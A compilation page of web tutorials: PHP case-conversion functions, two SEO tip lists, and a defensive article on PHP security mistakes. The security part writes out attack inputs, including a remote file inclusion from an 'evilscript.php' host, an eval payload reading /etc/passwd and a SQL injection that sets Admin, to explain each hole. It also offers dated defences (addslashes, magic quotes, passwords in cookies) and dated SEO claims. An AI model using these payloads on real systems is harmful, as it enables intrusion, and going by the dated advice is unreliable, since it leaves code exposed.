Play with string: String conversion in PHP

Let's take two strings:

$s = "convert upper case to lower case, lower case to upper case and more!";

$p = "Convert Case – Convert upper case to lower case, lower case to upper case and more! AccIdentALly left the caPs Lock on and typed something, but can’t be bothered to start again and retype it all?
Simply follow these following easy steps to COnvert your text to exactly how you want it. So, lEt’s try!!";

And then,

echo strtolower($p);
Output:-
convert case – convert upper case to lower case, lower case to upper case and more! accidentally left the caps lock on and typed something, but can’t be bothered to start again and retype it all? simply follow these following easy steps to convert your text to exactly how you want it. so, let’s try!!

——————————————————-

echo strtoupper($p);
Output:-

CONVERT CASE – CONVERT UPPER CASE TO LOWER CASE, LOWER CASE TO UPPER CASE AND MORE! ACCIDENTALLY LEFT THE CAPS LOCK ON AND TYPED SOMETHING, BUT CAN’T BE BOTHERED TO START AGAIN AND RETYPE IT ALL? SIMPLY FOLLOW THESE FOLLOWING EASY STEPS TO CONVERT YOUR TEXT TO EXACTLY HOW YOU WANT IT. SO, LET’S TRY!!

——————————————————————-
echo ucfirst($s);
Output:-

Convert upper case to lower case, lower case to upper case and more!

————————————————————————–
echo ucwords($s);

Output:-

Convert Upper Case To Lower Case, Lower Case To Upper Case And More!

————————————————————————–
echo strtosentencecase($p);

Output:-

Convert case – convert upper case to lower case, lower case to upper case and more! Accidentally left the caps lock on and typed something, but can’t be bothered to start again and retype it all? Simply follow these following easy steps to convert your text to exactly how you want it. So, let’s try!!

Function:-

function strtosentencecase($s) {
    $str = strtolower($s);
    $cap = true;
    $ret = '';
    for($x = 0; $x < strlen($str); $x++){
        $letter = substr($str, $x, 1);
        if($letter == '.' || $letter == '!' || $letter == '?'){
            $cap = true;
        }elseif(trim($letter) != '' && $cap == true){
            $letter = strtoupper($letter);
            $cap = false;
        }
        $ret .= $letter;
    }
    return $ret;
}
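A shorter alternative sketch uses a regex callback instead of the character loop. Like the loop version above, this assumes single-byte input; multibyte text would need the mb_* functions. The function name here is our own, not a PHP built-in:

```php
<?php
// Capitalize the first letter at the start of the string and after
// each sentence-ending ., !, or ? character.
function strtosentencecase_regex($s) {
    return preg_replace_callback(
        '/(^\s*|[.!?]\s*)([a-z])/',
        function ($m) { return $m[1] . strtoupper($m[2]); },
        strtolower($s)
    );
}

echo strtosentencecase_regex("hello world! this is a test. really?yes");
// prints "Hello world! This is a test. Really?Yes"
```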

——————————————————————————

Top 10 SEO Tips for Every Website: Jordan Kasteler

1. Canonical Domain Issues

2. Keyword Research

3. Title Tag Optimization

4. Meta Data

5. Keyword Density

6. On-page keyword Usage (ALT attribute, H tags, body copy, meta data, title, anchor text, images, file/folder names)

7. Sitemaps

8. Crawlability Issues

9. Code Optimization

10. Internal/External Links

1. Canonical Domain Issues – Typically a domain can be reached at several different versions such as: http://www.domain.com, domain.com, http://www.domain.com/index.( html | htm | php | asp | jsp | etc). Google can read your WWW and non-WWW as two different versions of your site. The bad thing about this is that it triggers a duplicate-content filter, and Google then chooses to index only one version. Let’s say Google indexed your non-WWW version, and all of your backlinks went primarily to your WWW version. Those backlinks are now wasted because their value isn’t being passed to the indexed version.

Solution: 301 redirects with a .htaccess file if your site is hosted on an Apache server. A 301 redirect is a “permanent move” of a Webpage. The code below tells bots to redirect the non-WWW, index.html, index.htm, and/or index.php versions to the http://www.domain.com version. Place the following code in a file called .htaccess and put it in the root directory of your site:

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{HTTP_HOST} ^domain\.com
RewriteRule ^(.*)$ http://www.domain.com/$1 [R=permanent,L]
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /([^/]+/)*index\.(html?|php)\ HTTP/
RewriteRule ^(([^/]+/)*)index\.(html?|php)$ http://www.domain.com/$1 [R=301,L]

If you’re using an IIS server instead of Apache then do this:

* Open Internet Services Manager, right click on the file or folder you wish to redirect

* Select “a redirection to a URL”

* Enter the Webpage of redirection

* Check “exact URL entered above” and “A permanent redirection for this resource”

* Then “Apply” those settings.

2. Keyword Research – There are a lot of great resources out there for keyword research that I’d like to share. One of my favorites is by Aaron Wall, author of SEOBook. His free tool is a compilation of many different keyword research sources run together to help you find what people are searching for. It can be found at SEOBook.

Overture.com, now part of Yahoo!, has always offered a free keyword selection tool: the Overture Keyword Suggestion Tool.

Keyworddiscovery.com and Wordtracker.com have always been the two biggest paid ones. However, Keyword Discovery is currently offering a free keyword search tool. There was a good article in Search Marketing Standard comparing the pros and cons of each. Unfortunately, I have not used Keyword Discovery, but I have been very pleased with Word Tracker. It’s also good for finding those long-tail keywords. In case you are wondering, the long tail refers to the less popular 5-7 word key phrases. A lot of marketers have found it very beneficial to target a large number of these longer phrases rather than the few extremely popular ones. I will blog more about this another time.

Incorporating words and phrasing related to your targeted keyword is very important to spiders, especially in relation to LSI/A and PaIR. I will blog more about LSI/A and PaIR later, but for now just know that your content should have a related theme to your keyword, and not just be filled with “happy text”. MSN recently released adCenter Labs. There is a tool there called “Search Result Clustering” which is great for finding keywords related to your main keyword. The caveat is that their data is based on their top 10 results for your keyword, and MSN ranks sites differently than Google: MSN results tend to favor on-page SEO while Google tends to favor off-page SEO.

3. Title Tag Optimization – Titles should stick to around 5-7 words. A lot of people will say that it’s not how many words but how many characters; I’ve found word count to be more important. Your title should have your main keyword and then your branding, typically.

For example: Utah Search Engine Optimization | Utah’s SEO Pro

I’ve managed to stick to 7 words, and incorporate my main keywords. Fortunately for me, my branding, “Utah’s SEO Pro”, is also related to my main keyphrase “Utah Search Engine Optimization”. Keywords and branding should be separated in titles with either a dash – or a pipe |. I lean towards pipes since dashes are also used in breaking up words.

4. Meta Data – How many times have you heard someone claiming they know SEO because they know how to construct meta data? I know I have many times. Meta data isn’t half as important as it used to be. I’ve read recently that MSN is the only one who cares about the meta description tag anymore. Even if they don’t matter they’re still good to have because some search engines still use them. Also, meta description is used as the descriptive text in your search engine listing. Here’s an example of proper meta data:
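The original example did not survive, but meta data for the example site above might look like this (the description and keyword values are illustrative):

```html
<title>Utah Search Engine Optimization | Utah's SEO Pro</title>
<meta name="description" content="Utah search engine optimization services and SEO consulting from Utah's SEO Pro.">
<meta name="keywords" content="utah search engine optimization, utah seo, seo consulting">
```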

Here are some rules to follow for your meta keyword:

* List keywords in order of most important to least important

* Keep keywords around 250 characters or below. MSN accepts a maximum of 1024.

* Be careful of repeating a keyphrase more than 6 or 7 times

* Don’t use keywords in your meta data that cannot be found on your page’s content

5. Keyword Density – It used to be that people kept a very close watch on the density of keywords in their body content. Typically they kept their keyword density around 2-7%. Nowadays there is very little weight on the keyword density of your content as long as it’s not overdone or unnatural-looking. The keyword density I’m referring to is in your meta data and title tag. I’m not going to give you an exact rule to follow; just use common sense. Don’t have your title, meta keywords, and meta description all be just your main keyphrase. That’s a 100% density and will raise a red flag.

6. On-page Keyword Usage – There is such a thing as over-optimization if you overuse your main keyphrase. The places you do want to have your keywords and keyphrases are:

* ALT attributes

* H tags

* Body copy

* Meta data

* Title

* Anchor text

* Images, file, and folder names

ALT attributes can be added to your image tags. They tell spiders and screen readers what that image is about. If possible, use your main keywords to describe the image.

H tags should be set up as a hierarchical tree of headings. Your main header description of your page’s content should be a H1 tag. The H1 tag is the most important and should include your main keywords or keyphrase. Secondary headers should be H2’s, Tertiary should be H3’s, etc.

Body copy should have your main keyphrases used throughout. It’s most important to have them in the first 200 and last 200 words of the content. Extra weight is given to them if they are bolded or italicized. This is an old technique that many SEOs cringe at using, but search engines, especially MSN, still give good weight for it. Like I said before, there is such a thing as over-optimization. I wouldn’t bold the main keywords more than 3 times in a typical 750-word page.

Meta data – We’ve discussed this up until now, but to recap: don’t overdo it. Don’t repeat a keyphrase more than 6 or 7 times, keep meta keywords to 1024 characters (preferably 250 or below), and don’t add keywords that can’t be found in your content.

Title – We’ve also discussed this as well. Don’t go too far past 7 words and don’t repeat your keywords in your title.

Anchor text is very important for internal and external links. Your anchor text tells crawlers and users what that link is about. It is important to use your main keywords in the anchor text of a link to give that particular page or site good ranking for that keyword or keyphrase. When getting backlinks from other people, try to vary your anchor text around your main keyphrase. Too many backlinks with the exact same keyphrase, especially in a short amount of time, will trigger Google’s ‘Google Bomb’ filter.

Images, files, and folder names should also be focused around your main keyphrase. Use dashes (-) when separating words in your naming convention. Dashes tell search engines that the word is separated. Underscores (_) tell search engines to read it as a whole. For example:

Utah-SEO-Pro.jpg will tell a search engine to read “Utah SEO Pro” as the name of that image.

Utah_SEO_Pro.jpg will tell a search engine to read “UtahSEOPro” as the name of the image.

Do you see where your keyphrase can be hurt by using underscores?

7. Sitemaps – Sitemaps are important to search engines and users. My favorite sitemap tool is http://www.xml-sitemaps.com. It will create an XML, ROR, and HTML sitemap for your Website. In addition, it will create a URL list of all your pages to submit to Yahoo! for indexing that can be submitted here http://search.yahoo.com/info/submit.html. The XML map is made especially for Google to submit to their Webmaster tools that can be submitted here http://www.google.com/webmasters/sitemaps/. This is important in telling Google how to crawl your site. MSN, Google, and Yahoo! teamed up to create one generalized protocol for XML sitemaps at http://www.sitemaps.org. It’s nice to see them playing together on this issue.
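A minimal sitemap under that shared protocol looks like this (the URL and values are illustrative):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://www.domain.com/</loc>
    <lastmod>2007-01-01</lastmod>
    <changefreq>weekly</changefreq>
    <priority>1.0</priority>
  </url>
</urlset>
```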

8. Crawlability Issues – Never hide your navigation behind Flash, JavaScript, or images. Always use text for search engines to crawl your navigation. CSS gives your text-based navigation the power of styling similar to using images and the power of rollover similar to JavaScript menus. Spiders have a hard time crawling Flash, an almost impossible time with JavaScript, and they can’t read text that is made from an image (although, Google’s new vector reading patent on images might change that in the future). If you are insistent on having a Flash menu or image-based menu then I suggest creating a text-equivalent alternative in the footer of your site.

If you have a dynamic site then your pages might not be crawlable if they have many parameters. If your URL looked like this for example:

http://www.domain.com/folder/index.php?var=1234&sort=date

Google can typically crawl up to 2 or 3 parameters of your site, but it’s best not to risk it. With any more parameters than that, you definitely need to use mod_rewrite.

Solution:

Mod_Rewrite. Many tools can be found on the internet, such as this one: http://www.linkvendor.com/seo-tools/url-rewrite.html. In a .htaccess file you can tell your Apache server to rewrite your parameter-based URL so it appears as a static URL, such as http://www.domain.com/folder/1234.html instead of http://www.domain.com/folder/index.php?var=1234&sort=date.
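As a sketch, the rewrite for the example URL above might look like this in .htaccess (the pattern is an assumption about the URL scheme; adjust it to your own parameters):

```apache
RewriteEngine on
# Serve /folder/1234.html internally from the parameter-based script
RewriteRule ^folder/([0-9]+)\.html$ /folder/index.php?var=$1&sort=date [L]
```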

9. Code Optimization – CSS layouts have many benefits over table layouts. They lessen your code-to-text ratio and allow spiders to access your content more easily without sifting through tons of nested markup. Keep your CSS and JavaScript out of the page head and in external files. This reduces your on-page markup and your index page’s file size, and it gives a slightly quicker load time. You can use PHP to combine your scripts into one file so the browser only makes one call to the server. It can also strip out empty space and comments to condense file size. To learn how to do that visit: http://www.ejeliot.com/blog/72.
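The combining idea can be sketched as a small PHP front-end script; the condensing step (stripping comments and collapsing whitespace) might look like this hypothetical helper, which is our own illustration rather than the linked article's code:

```php
<?php
// Strip /* ... */ comments and collapse runs of spaces and tabs.
function condense($code) {
    $code = preg_replace('!/\*.*?\*/!s', '', $code);
    return trim(preg_replace('/[ \t]+/', ' ', $code));
}

// A front controller could loop over several .css or .js files,
// run each through condense(), and echo them as one response.
echo condense("a { /* link color */  color:  red; }");
// prints "a { color: red; }"
```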

For table data use the “summary” attribute to tell screen readers (and search engines) what the content in that table is about. Also, use the ALT attribute to describe images. “Longdesc” is a good attribute if you have a longer description of something such as a Flash movie. You can store the description in a completely separate HTML file it will read from.

It’s good practice to keep your code validated. The World Wide Web Consortium offers great code validation tools for XHTML and CSS. Although Matt Cutts claimed that Google doesn’t care whether your code validates, other crawlers might. If there’s a code conflict it can stop a spider dead in its tracks, and it may not be able to fully crawl your site.

10. Internal/External Links – Receiving external links from other sites is the #1 item of importance for your rankings. If “content is king” then “linking is queen”. Just keep in mind that pages that link to you should be related to your content. One-way links from sites carry far greater weight than links that are reciprocated. Reciprocal links are a dying practice. Try to keep a good ratio of top-level URL links and deep links. This means don’t get all links going to your http://www.domain.com. Get some links going to the most prominent pages of your Website (i.e. http://www.domain.com/page.html). The reason is that it looks natural to search engines when someone links to something specific, like your internal page, rather than something general like your main domain. There are many variables that determine the weight of the link such as:

· The content of the page that’s linking to you

· Where on the page your link is (within the body content is the best)

· If it’s a directory listing then the higher on the page the better

· The anchor text of the link (should include your keywords)

· The number of outgoing links on the page that’s linking to you

· The relevance and authority of the page that’s linking to you (PageRank is a small determination of that)

· If the site linking to you is blacklisted in search engines or not

Internal links help users find things throughout your site, and help search engines crawl pages better. It’s good practice of information architecture to link to related pages within your content. This will help pass PageRank throughout your site as well.

10 SEO Tips to Remember While Launching a Site: Search Engine Journal

1.) Move JavaScript and CSS Off Page

Moving CSS and JS files off the page does two things. First, it creates cleaner code that is more easily managed. More importantly though, it frees up space that engines consider to be prime real estate. Let’s say a spider lends preferential treatment to content that appears in the first 20KB of a document. If 15KB at the start of your document is verbose JavaScript and CSS coding, you have created an uphill battle from the start…

2.) Code Validity is Key

Always make sure that the final code of your pages can fully validate according to W3C standards. Failure to validate could create accessibility issues — and the engines simply dislike that. They want to push their users out to complete sites that work for everyone.

3.) Browsable Navigation Links

Encapsulating links to internal pages in Flash or JavaScript is dangerous. While some engines can often find links from inside of these coding blocks, it is not guaranteed. Therefore, it is wise to always have an HTML compliant navigational structure. Examples include footer text links, a DHTML menu, etc.

4.) Use a Structured Content Hierarchy

A theme based approach to optimization is the most successful one. Imagine all of the content on your web site to mimic a family tree. Each layer down, there’s more content that fits the overall theme. By nature, the further you drill down — the more specific your content becomes.

5.) URL Construction & Query String URLs

Query strings in URLs are less of a problem today than they once were. Unfortunately, they can still create issues for some engines — and it’s our goal to make the most of the search industry. With this in mind I would recommend that you work with your coding teams to ensure that query strings are kept to a minimum.

6.) Limit Flash Usage

Putting all of your content in a Flash file creates a difficult platform from which to optimize. While it can be done, the results will not come as easily as if Flash were used as a complement to the rest of the page. Thankfully, with CSS and streamlined video on the ‘net, Flash is no longer a necessity. Remember, if you have to use Flash, cut down how much information is in there and find alternative ways to deliver the content.

7.) Natural Keyword Integration

Repeat after me… “I will not stuff pages with keywords!” Like the engines, I’m tired of seeing web sites that would be great if not for their blatant use of keyword stuffing. Listen up folks… Keyword density and repetition is a thing of the past. Engines are more about off page SEO now, and you need to write clear and concise content that addresses the user. Engines are keen to what makes sense contextually… Don’t try to pull the wool over their eyes.

8.) Local Information Integration

Sounds all technical and precise, but it’s quite simple. If you sell antiques in Tampa, Florida, then include that in your site. How? List (in HTML-formatted text, of course) where you are located. Include a link to Google (or Yahoo!) Maps to help hammer home the point. Search is becoming more focused on users at a local level, so building sites with this in mind should be a given.

9.) Avoid Duplicate Content

This is pretty self-explanatory, and it’s an SEO principle that has been hammered home many times. Why keep hammering? Because it’s that important! Be sure that you don’t get lazy and copy content from one page to the next. Each page should be specifically targeting one major idea, and the text needs to reflect that. Think you’re at risk? A free similarity-checking tool can tell you the percentage of similarity between any two pages.

10.) Launch With the Proper Foundation

Is your new site equipped with a robots.txt file? An XML sitemap? RSS Feeds? Before you launch any new web site you need to run a full QA test to ensure that…

• all pages load properly

• no browser compatibility issues exist

• SEO elements (titles, meta tags, alt tags, etc.) are in place

• spiders can discover all pages

• robots.txt validates

• sitemap.xml(.gz) works

Doing this will really cut down on any potential errors out of the gates, and will put you in a position to succeed.
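A bare-bones robots.txt for the QA checklist above might look like this; it allows full crawling and advertises the sitemap (the Sitemap line follows the sitemaps.org convention, and the URL is illustrative):

```text
User-agent: *
Disallow:

Sitemap: http://www.domain.com/sitemap.xml
```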

PHP Security Mistakes : Article from Developer Shed

PHP Security Mistakes

The purpose of this document is to inform PHP programmers of common security mistakes that can be overlooked in PHP scripts. While many of the following concepts may appear to be common sense, they are unfortunately not always common practice. After applying the following practices to your coding, you will be able to eliminate the vast majority of security holes that plague many scripts. Many of these security holes have been found in widely-used open source and commercial PHP scripts in the past.

The most important concept to learn from this article is that you should never trust the user to input exactly what is expected. The way most PHP scripts are compromised is by entering unexpected data to exploit security holes inadvertently left in the script.

Always keep the following principles in mind when designing your scripts:

1. Never include, require, or otherwise open a file with a filename based on user input, without thoroughly checking it first.

Take the following example:

if(isset($page))
{
    include($page);
}

Since there is no validation being done on $page, a malicious user could hypothetically call your script like this (assuming register_globals is set to ON):

script.php?page=/etc/passwd

This causes your script to include the server’s /etc/passwd file. When a non-PHP file is include()'d or require()'d, it’s displayed as HTML/text, not parsed as PHP code.

On many PHP installations, the include() and require() functions can include remote files. If the malicious user were to call your script like this:

script.php?page=http://mysite.com/evilscript.php

He or she would be able to have evilscript.php output any PHP code for your script to execute. Imagine if the user sent code to delete content from your database or even send sensitive information directly to the browser.

Solution: validate the input. One method of validation would be to create a list of acceptable pages. If the input did not match any of those pages, an error could be displayed.

$pages = array('index.html', 'page2.html', 'page3.html');

if( in_array($page, $pages) )
{
    include($page);
}
else
{
    die("Nice Try.");
}

2. Be careful with eval()

Placing user-inputted values into the eval() function can be extremely dangerous. You essentially give the malicious user the ability to execute any command he or she wishes! You may envision the input coming from a drop-down menu of options you specify, but your user may decide to send input like this:

script.php?input=;passthru("cat /etc/passwd");

By putting his own code in that statement, the user could cause your program to output your server’s complete /etc/passwd file.

Use eval() sparingly, and by all means, validate the input. It should only be used when absolutely necessary — when there is dynamically generated PHP code. If you are using it to substitute template variables into a string or substitute user-inputted values, then you are using it for the wrong reason. Try sprintf() or a template system instead.
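For instance, instead of eval()'ing a template string with user data in it, sprintf() substitutes the values without ever treating them as code (the template and values here are illustrative):

```php
<?php
// Placeholders are filled in as plain strings/numbers, never executed,
// so even hostile-looking input stays inert.
$template = "Hello %s, you have %d new messages.";
$name = ';passthru("cat /etc/passwd");'; // hostile input is harmless here
echo sprintf($template, $name, 5);
```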

3. Be careful when using register_globals = ON

This has been a major issue since this feature was invented. It was originally designed to make programming in PHP easier (and that it did), but misuse of it often led to security holes. As of PHP 4.2.0, register_globals is set to OFF by default. It is recommended that you use the superglobals to deal with input ($_GET, $_POST, $_COOKIE, $_SESSION, etc).

For example, let us say that you had a variable that specified what page to include:

include($page);

but you intended $page to be defined in a config file or somewhere else in the script, and not to come as user input. In one instance you forgot to pre-define $page. If register_globals is set to ON, the malicious user can take over and define $page for you, by calling your script like this:

script.php?page=http://www.example.com/evilscript.php

I recommend you develop with register_globals set to OFF, and use the superglobals when accessing user input. In addition, you should always develop with full error reporting, which can be specified like this (at the top of your script):

error_reporting(E_ALL);

This way, you will receive a notice for every variable you try to call that was not previously defined. Yes, PHP does not require you to define variables so there may be notices that you can ignore, but this will help you to catch undefined variables that you did expect to come from input or other sources. In the previous example, when $page was referenced in the include() statement, PHP would issue a notice that $page was not defined.

Whether or not you want to use register_globals is up to you, but make sure you are aware of the advantages and disadvantages of it and how to remedy the possible security holes.

4. Never run unescaped queries

PHP has a feature, enabled by default, that automatically escapes (adds a backslash in front of) certain characters that come in from a GET, POST, or COOKIE. The single quote (‘) is one example of a character that is escaped automatically. This is done so that if you include input variables in your SQL queries, it will not treat single quotes as part of the query. Say your user entered $name from a form and you performed this query:

UPDATE users SET Name='$name' WHERE ID=1;

Normally, if they had entered $name with single quotes in them, they would be escaped, so MySQL would see this:

UPDATE users SET Name='Joe\'s' WHERE ID=1

so that the single quote entered into “Joe’s” would not interfere with the query syntax.

In some situations, you may use stripslashes() on an input variable. If you put the variable into a query, make sure to use addslashes() or mysql_escape_string() to escape the single quotes before you run the query. Imagine if an unslashed query went in, and a malicious user had entered part of a query as their name!

UPDATE users SET Name='Joe',Admin='1' WHERE ID=1

On the input form, the user would have entered:

Joe',Admin='1

As their name, and since the single quotes were not escaped, he or she would be able to actually end the name definition, place in a comma, and set another variable called Admin!

The final query, with the injected input included, would look like this:

UPDATE users SET Name='Joe',Admin='1' WHERE ID=1

In some configurations, magic_quotes_gpc (the feature that automatically adds slashes to all input) is actually set to OFF. You can use the function get_magic_quotes_gpc() to see if it’s on or not (it returns true or false). If it returns false, simply use addslashes() to add slashes to all of the input (it is easiest if you use $_POST, $_GET, and $_COOKIE or $HTTP_POST_VARS, $HTTP_GET_VARS, and $HTTP_COOKIE_VARS, instead of globals because you could step through those arrays using a foreach() loop and add slashes to each one).
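The foreach() approach described above might be sketched like this; addslashes_deep is a hypothetical helper of our own, not a PHP built-in, and the function_exists() guard is an addition so the sketch also runs on PHP versions where magic quotes no longer exist:

```php
<?php
// Recursively escape every value in an input array.
function addslashes_deep($input) {
    foreach ($input as $key => $value) {
        $input[$key] = is_array($value)
            ? addslashes_deep($value)
            : addslashes($value);
    }
    return $input;
}

// If magic_quotes_gpc is off (or gone entirely, as on modern PHP),
// escape all GET/POST/COOKIE input ourselves.
if (!function_exists('get_magic_quotes_gpc') || !get_magic_quotes_gpc()) {
    $_GET    = addslashes_deep($_GET);
    $_POST   = addslashes_deep($_POST);
    $_COOKIE = addslashes_deep($_COOKIE);
}
```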

5. For protected areas, use sessions or validate the login every time.

There are some cases where programmers will only use some sort of login.php script to first validate the username and password (entered through a form), test whether the user is an administrator or valid user, and then set a variable through a cookie, or even hide it as a hidden form variable. Then in the code, they check access like this:

if($admin)
{
    // let them in
}
else
{
    // kick them out
}

The above code makes the fatal assumption that the $admin variable can only come from a cookie or input form that the malicious user has no control over. However, that is simply not the case. With register_globals enabled, injecting designed input into the $admin variable is as easy as calling the script like so:

script.php?admin=1

Furthermore, even if you use the superglobals $_COOKIE or $_POST, a malicious user can easily forge a cookie or create his own HTML form to post any information to your script.

There are two good solutions to this problem. One is on the same track as setting an $admin variable, but this time set $admin as a session variable. In this case, it is stored on the server and is much less likely to be forged. On subsequent calls to the same script, your user’s previous session information will be available on the server, and you will be able to verify if the user is an administrator like so:

if( $_SESSION['admin'] )

The second solution is to only store their username and password in a cookie, and with every call to the script, validate the username and password and verify if the user is an administrator. You could have two functions — one called validate_login($username,$password) that verified the user’s login information, and one called is_admin($username) that queried the database to see if that username is an administrator. The code would be placed at the top of any protected script:

if( !validate_login( $_COOKIE['username'], $_COOKIE['password'] ) )
{
    echo "Sorry, invalid login";
    exit;
}

// the login is ok if we made it down here

if( !is_admin( $_COOKIE['username'] ) )
{
    echo "Sorry, you do not have access to this section";
    exit;
}

Personally I recommend using sessions, as the latter solution is not scalable.

6. If you don’t want the file contents to be seen, give the file a .php extension.

It was common practice for a while to name include files or library files with a .inc extension. Here’s the problem: if a malicious user simply enters the .inc file’s URL into his browser, it will be displayed as plain text, not parsed as PHP. Even if the browser did not like the file type, an option to download it would most likely be given. Imagine if this file had your database login and password, or even more sensitive information.

This goes for any other extension other than .php (and a few others), so even a .conf or a .cfg file would not be safe.

The solution is to put a .php extension on the end of it. Since your include files or config files usually just define variables and/or functions and not really output anything, if your user were to load this, for example, into their browser:

http://yoursite.com/lib.inc.php

they would most likely be shown nothing at all, unless your lib.inc.php outputs something. Either way, the file would be parsed as PHP instead of just displaying your code.

There are also some reports of people adding Apache directives that will deny access to .inc files; however, I do not recommend this because of the lack of portability. If you rely on .inc files and an Apache directive to deny access to them, and one day you move your scripts to another server and forget to carry the directive over, you are wide open.
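For reference, the kind of directive people use looks like this (Apache 2.2-style access control); as noted above, it only protects you for as long as the directive is actually in place on the server:

```apache
<Files ~ "\.inc$">
    Order allow,deny
    Deny from all
</Files>
```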